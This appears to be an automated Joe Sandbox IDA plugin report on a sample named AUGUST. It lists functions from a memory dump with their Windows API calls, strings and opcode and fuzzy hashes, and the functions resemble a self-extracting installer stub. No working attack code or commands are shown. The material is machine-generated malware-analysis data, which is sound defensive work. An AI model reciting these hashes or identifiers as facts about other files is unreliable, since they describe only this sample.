Associated: 0000000E.00000002.2748010350.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748044403.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748059998.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748074653.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748074653.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_AUGUST.jbxd

Similarity

API ID: ??3@
String ID: BeginPrompt$ErrorTitle$FinishMessage$HelpText$SetEnvironment$WarningTitle
API String ID: 613200358-994561823
Opcode ID: 971dcdd12a827a4034ed94f9ba1d623efd1f14b2bcca4d73e06b44b648e667ed
Instruction ID: 5566f9f9667118f06bc812855c9affabb63102f3a10b3971892d5eca1131561f
Opcode Fuzzy Hash: 971dcdd12a827a4034ed94f9ba1d623efd1f14b2bcca4d73e06b44b648e667ed
Instruction Fuzzy Hash: CA51D47080420AAACF24AB559E85AFB7774EB20348F54443FF881722E1EF7D5D82D64E

Function 00406DB2 Relevance: 12.1, APIs: 8, Instructions: 69COMMON

Download Yara Rule

APIs

memcpy.MSVCRT(?,00417410,00000160), ref: 00406DD1
SystemParametersInfoW.USER32(00000029,00000000,?,00000000), ref: 00406DF0
GetDC.USER32(00000000), ref: 00406DFB
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00406E07
MulDiv.KERNEL32(?,00000048,00000000), ref: 00406E16
ReleaseDC.USER32(00000000,?), ref: 00406E24
GetModuleHandleW.KERNEL32(00000000), ref: 00406E4C
DialogBoxIndirectParamW.USER32(00000000,?,?,Function_0000667A), ref: 00406E81

Memory Dump Source

Source File: 0000000E.00000002.2748025876.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2748010350.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748044403.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748059998.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748074653.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748074653.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_AUGUST.jbxd

Similarity

API ID: CapsDeviceDialogHandleIndirectInfoModuleParamParametersReleaseSystemmemcpy
String ID:
API String ID: 2693764856-0
Opcode ID: e70a94c77e8458ae7b0f85d98e5dff18e09bef3a98047e8bed90a0db42bf0d7e
Instruction ID: b2c1943609947f3a034a1f42a4fd453b3666a2b5c4d4ccfd9a1c2059c5c1cb6f
Opcode Fuzzy Hash: e70a94c77e8458ae7b0f85d98e5dff18e09bef3a98047e8bed90a0db42bf0d7e
Instruction Fuzzy Hash: C32184B5500218BFDB215F61DC45EEB7B7CFB08746F0040B6F609A1190D7748E948B65

Function 0040695E Relevance: 12.1, APIs: 8, Instructions: 68COMMON

Download Yara Rule

APIs

GetDC.USER32(?), ref: 0040696E
GetSystemMetrics.USER32(0000000B), ref: 0040698A
GetSystemMetrics.USER32(0000003D), ref: 00406993
GetSystemMetrics.USER32(0000003E), ref: 0040699B
SelectObject.GDI32(?,?), ref: 004069B8
DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 004069D3
SelectObject.GDI32(?,?), ref: 004069F9
ReleaseDC.USER32(?,?), ref: 00406A08

Memory Dump Source

Source File: 0000000E.00000002.2748025876.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2748010350.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748044403.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748059998.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748074653.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748074653.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_AUGUST.jbxd

Similarity

API ID: MetricsSystem$ObjectSelect$DrawReleaseText
String ID:
API String ID: 2466489532-0
Opcode ID: 3371c90df87af61a96ab0a4f5adfc31794890a389d4733c3cd0e84d47817aa4d
Instruction ID: 7c755332e1b278278a0584394201b19561512224090c74d51841a9ad660c27ee
Opcode Fuzzy Hash: 3371c90df87af61a96ab0a4f5adfc31794890a389d4733c3cd0e84d47817aa4d
Instruction Fuzzy Hash: 6B216871900209EFCB119F65DD84A8EBFF4EF08321F10C46AE559A72A0C7359A50DF40

Function 00407B33 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 102windowCOMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00407B6D
GetDlgItem.USER32(?,000004B8), ref: 00407B8B
SendMessageW.USER32(00000000,00000402,00000000,00000000), ref: 00407B9D
wsprintfW.USER32 ref: 00407BBB
??3@YAXPAX@Z.MSVCRT(?), ref: 00407C53

Strings

%d%%, xrefs: 00407BB5

Memory Dump Source

Source File: 0000000E.00000002.2748025876.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2748010350.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748044403.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748059998.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748074653.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748074653.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_AUGUST.jbxd

Similarity

API ID: ??3@ItemMessageSendUnothrow_t@std@@@__ehfuncinfo$??2@wsprintf
String ID: %d%%
API String ID: 3753976982-1518462796
Opcode ID: 0b792d7adb6174ba2d50e5ca9cf87896ffea0db59519718aa7dbff65f529ef39
Instruction ID: b955b8041d8a67620c3180d4911c799512bd6939d195f5b55c3092177650065a
Opcode Fuzzy Hash: 0b792d7adb6174ba2d50e5ca9cf87896ffea0db59519718aa7dbff65f529ef39
Instruction Fuzzy Hash: 1D31D371904208BBDB11AFA0CC45EDA7BB9EF48708F10847AFA42B61E1D779B904CB59

Function 0040408B Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 96stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(hAA,00000020,?,?,00405838,?,?,?,00000000,?), ref: 004040A4

Part of subcall function 00401A85: CharUpperW.USER32(?,7622E0B0,00000000,00000000,?,?,?,00403DBD,00000002), ref: 00401AC3
Part of subcall function 00401A85: CharUpperW.USER32(?,?,?,?,00403DBD,00000002), ref: 00401ACF

??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?), ref: 00404156
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?), ref: 0040415E
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?), ref: 0040416D
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?), ref: 00404175

Strings

hAA, xrefs: 00404091, 0040409B, 004040A2, 004040B0

Memory Dump Source

Source File: 0000000E.00000002.2748025876.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2748010350.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748044403.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748059998.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748074653.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748074653.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_AUGUST.jbxd

Similarity

API ID: ??3@$CharUpper$lstrlen
String ID: hAA
API String ID: 2587799592-1362906312
Opcode ID: f1afb06a12cfea52e195ddd9e8ddb158cdff932f9735d488ba252034b153affa
Instruction ID: 7f7e13310b21401de90169bcc26cd057e2afddf23eedd5de54135d69024cf91c
Opcode Fuzzy Hash: f1afb06a12cfea52e195ddd9e8ddb158cdff932f9735d488ba252034b153affa
Instruction Fuzzy Hash: D7212772D40215AACF20ABA4CC46AEB77B9DF90354F10407BEB41BB2E1E7789D848658

Function 00404CBC Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 92COMMON

Download Yara Rule

APIs

??3@YAXPAX@Z.MSVCRT(?,00000000,00000001,00000000,00000000,00000001,?,00000000), ref: 00404D3E
??3@YAXPAX@Z.MSVCRT(?,?,?,004054CC,?,;!@InstallEnd@!,004054CC,;!@Install@!UTF-8!,00417400,00000000,00000001,?,00000000), ref: 00404DA0
??3@YAXPAX@Z.MSVCRT(?,?,?,004054CC,?,;!@InstallEnd@!,004054CC,;!@Install@!UTF-8!,00417400,00000000,00000001,?,00000000), ref: 00404DB8

Part of subcall function 00403354: lstrlenW.KERNEL32(00404AC6,?,?,00000000,?,?,?,?,00404AC6,?), ref: 00403361
Part of subcall function 00403354: GetSystemTimeAsFileTime.KERNEL32(?,00404AC6,?,?,?,?,00404AC6,?,?,?,?,?,?,?,?,?), ref: 004033D7
Part of subcall function 00403354: GetFileAttributesW.KERNELBASE(?,?,?,?,?,00404AC6,?,?,?,?,?,?,?,?,?,00000000), ref: 004033DE
Part of subcall function 00403354: ??3@YAXPAX@Z.MSVCRT(?,00404AC6,?,?,?,?,00404AC6,?,?,?,?,?,?,?,?,?), ref: 0040349D

Strings

;!@InstallEnd@!, xrefs: 00404D73
;!@Install@!UTF-8!, xrefs: 00404D59
03A, xrefs: 00404CCF

Memory Dump Source

Source File: 0000000E.00000002.2748025876.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2748010350.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748044403.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748059998.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748074653.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748074653.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_AUGUST.jbxd

Similarity

API ID: ??3@$FileTime$AttributesSystemlstrlen
String ID: 03A$;!@Install@!UTF-8!$;!@InstallEnd@!
API String ID: 4038993085-2279431206
Opcode ID: 1e5f1ef11ab3d9e84330ff60a8d60345b5fdf25d940142a54a900a3d947b53ea
Instruction ID: 637b7b13a9bcd1d52ea1019587bfa2fb4435f6835f564ae220b3123002230846
Opcode Fuzzy Hash: 1e5f1ef11ab3d9e84330ff60a8d60345b5fdf25d940142a54a900a3d947b53ea
Instruction Fuzzy Hash: CE312D71D0021EEACF05EF92CD429EEBBB4BF44318F10042BE911762E1DB785649DB98

Function 0040755F Relevance: 10.6, APIs: 7, Instructions: 63timethreadinjectionCOMMON

Download Yara Rule

APIs

EndDialog.USER32(?,00000000), ref: 00407579
KillTimer.USER32(?,00000001), ref: 0040758A
SetTimer.USER32(?,00000001,00000000,00000000), ref: 004075B4
SuspendThread.KERNEL32(00000294), ref: 004075CD
ResumeThread.KERNEL32(00000294), ref: 004075EA
EndDialog.USER32(?,00000000), ref: 0040760C

Memory Dump Source

Source File: 0000000E.00000002.2748025876.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2748010350.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748044403.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748059998.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748074653.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748074653.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_AUGUST.jbxd

Similarity

API ID: DialogThreadTimer$KillResumeSuspend
String ID:
API String ID: 4151135813-0
Opcode ID: fa37b7d0569be928e5d0aecc9653dabfd5de706af621d680b5378aa8e85f3b57
Instruction ID: ebb94c5c4675b2e6542c2b2cb7d5652cccd5624f9a00d71f737e39ca63bd9789
Opcode Fuzzy Hash: fa37b7d0569be928e5d0aecc9653dabfd5de706af621d680b5378aa8e85f3b57
Instruction Fuzzy Hash: 9811BF70A08618BBD7212F15EE849E77BBDFB00756B00843AF523A05A0CB39BD00DA1D

Function 00404E3F Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 60COMMON

Download Yara Rule

APIs

??3@YAXPAX@Z.MSVCRT(004177C4,004177C4,004177C4,00000000,0000002B,;!@InstallEnd@!,;!@Install@!UTF-8!,00000000,00000000), ref: 00404E85

Part of subcall function 00404343: ??3@YAXPAX@Z.MSVCRT(?,?,?,004177C4,004177C4,?,;!@InstallEnd@!,;!@Install@!UTF-8!,00000000,00000000), ref: 004043B6

??3@YAXPAX@Z.MSVCRT(004177C4,004177C4,004177C4,00000000,0000002B,004177C4,004177C4,00000000,0000002B,;!@InstallEnd@!,;!@Install@!UTF-8!,00000000,00000000), ref: 00404EAB
wsprintfA.USER32 ref: 00404EBC

Strings

;!@InstallEnd@!, xrefs: 00404E59
;!@Install@!UTF-8!, xrefs: 00404E4A
:Language:%u!, xrefs: 00404EB6

Memory Dump Source

Source File: 0000000E.00000002.2748025876.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2748010350.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748044403.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748059998.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748074653.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748074653.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_AUGUST.jbxd

Similarity

API ID: ??3@$wsprintf
String ID: :Language:%u!$;!@Install@!UTF-8!$;!@InstallEnd@!
API String ID: 2704270482-1550708412
Opcode ID: b3a647dc230e6375ba5304378dede3f86871d19815b7720c308d82744c7d9f3d
Instruction ID: afe26c372a183c0ca4a1b7edc16cb7be903c3e4040aad79e05e22cec791dc9d0
Opcode Fuzzy Hash: b3a647dc230e6375ba5304378dede3f86871d19815b7720c308d82744c7d9f3d
Instruction Fuzzy Hash: D8115E71B00018BBCF00FB95CC42EFE77ADAB84705B10402EBA15E3182DB78AB028799

Function 00403880 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 56COMMON

Download Yara Rule

APIs

??3@YAXPAX@Z.MSVCRT(00417788,00417788,00000000,%%T\,0041350C,00000000,00417788,00407405,?,00000000,00000000,00000000), ref: 004038C6
??3@YAXPAX@Z.MSVCRT(00417788,00417788,00000000,%%T/,004134FC,00000000,00417788,00000000,%%T\,0041350C,00000000,00417788,00407405,?,00000000,00000000), ref: 00403904
??3@YAXPAX@Z.MSVCRT(00417788,00417788,00000000,00417788,00417788,00000000,%%T/,004134FC,00000000,00417788,00000000,%%T\,0041350C,00000000,00417788,00407405), ref: 0040392A
??3@YAXPAX@Z.MSVCRT(00000000,00417788,00417788,00000000,00417788,00417788,00000000,%%T/,004134FC,00000000,00417788,00000000,%%T\,0041350C,00000000,00417788), ref: 00403932

Strings

%%T/, xrefs: 004038E4
%%T\, xrefs: 004038A6

Memory Dump Source

Source File: 0000000E.00000002.2748025876.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2748010350.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748044403.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748059998.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748074653.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748074653.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_AUGUST.jbxd

Similarity

API ID: ??3@
String ID: %%T/$%%T\
API String ID: 613200358-2679640699
Opcode ID: 9eec194740abc4bee078c15c8dc217b66edb47652cee4dab90ed516c3b80c8f9
Instruction ID: 53c9ca64f2466311d4136dbbff57d229d1af9e29f5fa76e56e45344ae10c91f3
Opcode Fuzzy Hash: 9eec194740abc4bee078c15c8dc217b66edb47652cee4dab90ed516c3b80c8f9
Instruction Fuzzy Hash: 5011DD3190410EBACF05FFA1D857CEDBB79AE00708F50806AB511760E1EF79A785DB98

Function 0040393B Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 56COMMON

Download Yara Rule

APIs

??3@YAXPAX@Z.MSVCRT(00414784,00414784,00000000,%%S\,0041350C,00000000,00414784,00407405,?,00000000,00000000,00000000), ref: 00403981
??3@YAXPAX@Z.MSVCRT(00414784,00414784,00000000,%%S/,004134FC,00000000,00414784,00000000,%%S\,0041350C,00000000,00414784,00407405,?,00000000,00000000), ref: 004039BF
??3@YAXPAX@Z.MSVCRT(00414784,00414784,00000000,00414784,00414784,00000000,%%S/,004134FC,00000000,00414784,00000000,%%S\,0041350C,00000000,00414784,00407405), ref: 004039E5
??3@YAXPAX@Z.MSVCRT(00000000,00414784,00414784,00000000,00414784,00414784,00000000,%%S/,004134FC,00000000,00414784,00000000,%%S\,0041350C,00000000,00414784), ref: 004039ED

Strings

%%S/, xrefs: 0040399F
%%S\, xrefs: 00403961

Memory Dump Source

Source File: 0000000E.00000002.2748025876.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2748010350.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748044403.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748059998.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748074653.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748074653.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_AUGUST.jbxd

Similarity

API ID: ??3@
String ID: %%S/$%%S\
API String ID: 613200358-358529586
Opcode ID: c94d4b60668bfb9eedf3143ce332dc4c41685f87d495a97f985edcc2faf71bca
Instruction ID: c240205f9e12946546b7747d8fd44f392230bc1153c6614d6b8016afa5fd7689
Opcode Fuzzy Hash: c94d4b60668bfb9eedf3143ce332dc4c41685f87d495a97f985edcc2faf71bca
Instruction Fuzzy Hash: 1D11AD3190410EBACF05FFA1D856CEDBB79AE00708F51806AB511760E1EF78A789DB98

Function 004039F6 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 56COMMON

Download Yara Rule

APIs

??3@YAXPAX@Z.MSVCRT(00414784,00414784,00000000,%%M\,0041350C,00000000,00414784,00407405,?,00000000,00000000,00000000), ref: 00403A3C
??3@YAXPAX@Z.MSVCRT(00414784,00414784,00000000,%%M/,004134FC,00000000,00414784,00000000,%%M\,0041350C,00000000,00414784,00407405,?,00000000,00000000), ref: 00403A7A
??3@YAXPAX@Z.MSVCRT(00414784,00414784,00000000,00414784,00414784,00000000,%%M/,004134FC,00000000,00414784,00000000,%%M\,0041350C,00000000,00414784,00407405), ref: 00403AA0
??3@YAXPAX@Z.MSVCRT(00000000,00414784,00414784,00000000,00414784,00414784,00000000,%%M/,004134FC,00000000,00414784,00000000,%%M\,0041350C,00000000,00414784), ref: 00403AA8

Strings

%%M/, xrefs: 00403A5A
%%M\, xrefs: 00403A1C

Memory Dump Source

Source File: 0000000E.00000002.2748025876.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2748010350.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748044403.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748059998.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748074653.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748074653.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_AUGUST.jbxd

Similarity

API ID: ??3@
String ID: %%M/$%%M\
API String ID: 613200358-4143866494
Opcode ID: 3eb134fca1680c0093703720a533bafa1d2fd801437f3d80c27f205d784cf8f2
Instruction ID: 5f6947e2f47a7d655e02fb84317d9747a35bc7200d49f7273ebe403b31479b31
Opcode Fuzzy Hash: 3eb134fca1680c0093703720a533bafa1d2fd801437f3d80c27f205d784cf8f2
Instruction Fuzzy Hash: C911AD3190410EBACF05FFA1D956CEDBB79AE00708F51806AB511760E1EF78A789DB58

Function 0040E456 Relevance: 10.5, APIs: 1, Strings: 6, Instructions: 42COMMON

Download Yara Rule

APIs

_CxxThrowException.MSVCRT(00000000,00414CFC), ref: 0040E4EE

Strings

xJA, xrefs: 0040E493
hJA, xrefs: 0040E49A
DJA, xrefs: 0040E4A8
TJA, xrefs: 0040E4A1
4JA, xrefs: 0040E4AF
$JA, xrefs: 0040E4B6

Memory Dump Source

Source File: 0000000E.00000002.2748025876.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2748010350.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748044403.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748059998.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748074653.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748074653.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_AUGUST.jbxd

Similarity

API ID: ExceptionThrow
String ID: $JA$4JA$DJA$TJA$hJA$xJA
API String ID: 432778473-803145960
Opcode ID: 8cab838d89dd1577677f775eaf8cb930bb6d64206a7fe5cceb0cff601651d84b
Instruction ID: 5492ea6659e041f1bcf420c4685f7038b08242b420f8f2c51a6428b2159ddc92
Opcode Fuzzy Hash: 8cab838d89dd1577677f775eaf8cb930bb6d64206a7fe5cceb0cff601651d84b
Instruction Fuzzy Hash: 7211A5F0541B419BC7308F16E544587FBF8AF907587218A1FD0AA9BA51D3F8A1888B9C

Function 0040C0DC Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 243COMMON

Download Yara Rule

APIs

Part of subcall function 0040BA46: ??2@YAPAXI@Z.MSVCRT(0000000C,?,0040C20C,004149B0,00000001,?,?,00000000), ref: 0040BA4B

??3@YAXPAX@Z.MSVCRT(00000000,004149B0,00000001,?,?,00000000), ref: 0040C20D

Part of subcall function 0040ADC3: ??2@YAPAXI@Z.MSVCRT(?,?,?,?,0040B1B6,00010000), ref: 0040ADD6
Part of subcall function 0040ADC3: memmove.MSVCRT(00000000,?,?,?,?,?,0040B1B6,00010000), ref: 0040ADF0
Part of subcall function 0040ADC3: ??3@YAXPAX@Z.MSVCRT(?,?,?,?,0040B1B6,00010000), ref: 0040AE00

??2@YAPAXI@Z.MSVCRT(00000014,00000000,004149B0,00000001,?,?,00000000), ref: 0040C245

Strings

IA, xrefs: 0040C0EC
IA, xrefs: 0040C11B
IA, xrefs: 0040C12D

Memory Dump Source

Source File: 0000000E.00000002.2748025876.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2748010350.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748044403.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748059998.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748074653.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748074653.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_AUGUST.jbxd

Similarity

API ID: ??2@$??3@$memmove
String ID: IA$IA$IA
API String ID: 4294387087-924693538
Opcode ID: 85fc5e494f6b2b84d8098d484c2c91b8b6bfa0a3dc3e29a15476b27879269a5e
Instruction ID: 38d37476858cbe2739f158cf8086d9562841ccd83740beefedbf55b6536d6dac
Opcode Fuzzy Hash: 85fc5e494f6b2b84d8098d484c2c91b8b6bfa0a3dc3e29a15476b27879269a5e
Instruction Fuzzy Hash: 20B1C1B1900209DFCB54EFAAC8819DEBBB5BF48304F50852EF919A7291DB38A945CF54

Function 0040E811 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58COMMON

Download Yara Rule

APIs

_CxxThrowException.MSVCRT(00100EC3,00414CFC), ref: 0040E83C
??2@YAPAXI@Z.MSVCRT(?,IA,IA,00000000,?,0040E909,00000000,00408769,IA,00402F92,00000000,00000000,004044E9,?,?,?), ref: 0040E864
memcpy.MSVCRT(00000000,?,?,IA,IA,00000000,?,0040E909,00000000,00408769,IA,00402F92,00000000,00000000,004044E9,?), ref: 0040E88D
??3@YAXPAX@Z.MSVCRT(?,IA,IA,00000000,?,0040E909,00000000,00408769,IA,00402F92,00000000,00000000,004044E9,?,?,?), ref: 0040E898

Strings

IA, xrefs: 0040E818, 0040E841

Memory Dump Source

Source File: 0000000E.00000002.2748025876.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2748010350.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748044403.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748059998.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748074653.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748074653.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_AUGUST.jbxd

Similarity

API ID: ??2@??3@ExceptionThrowmemcpy
String ID: IA
API String ID: 3462485524-3293647318
Opcode ID: 87c970ed3d1d6bacfe04aab15aff8add49b6e5554cbd4f9de67434676486f6a2
Instruction ID: e9362666a157510f6fc1816af10740f0f0ab3f4ff6eb75305f8b2a096945a613
Opcode Fuzzy Hash: 87c970ed3d1d6bacfe04aab15aff8add49b6e5554cbd4f9de67434676486f6a2
Instruction Fuzzy Hash: 6811E5736003009BCB28AF57D880D6BFBE9AB84354714C83FEA59A7290D779E8954794

Function 00401000 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 44stringCOMMON

Download Yara Rule

APIs

wsprintfW.USER32 ref: 00401029
wsprintfW.USER32 ref: 00401049
lstrcatW.KERNEL32(?,?), ref: 0040105C
ExitProcess.KERNEL32 ref: 00401084

Strings

0x%p, xrefs: 00401043

Memory Dump Source

Source File: 0000000E.00000002.2748025876.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2748010350.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748044403.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748059998.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748074653.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748074653.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_AUGUST.jbxd

Similarity

API ID: wsprintf$ExitProcesslstrcat
String ID: 0x%p
API String ID: 2530384128-1745605757
Opcode ID: beb3389330693802dd4b40a551927b7f0c9c9e0999a7fc1e7fc7f64098bb755c
Instruction ID: 6c9eba3c29ae2a0cc7ccd16f79f39b6d6218d418ab2b897ff95ca6c62132cda7
Opcode Fuzzy Hash: beb3389330693802dd4b40a551927b7f0c9c9e0999a7fc1e7fc7f64098bb755c
Instruction Fuzzy Hash: CF019E7580020CAFDB20AFA0DC45FDA777CBF44305F04486AF945A2081D738F6948FAA

Function 00407A3A Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 85COMMON

Download Yara Rule

APIs

Part of subcall function 004071B8: GetSystemMetrics.USER32(0000000B), ref: 004071E0
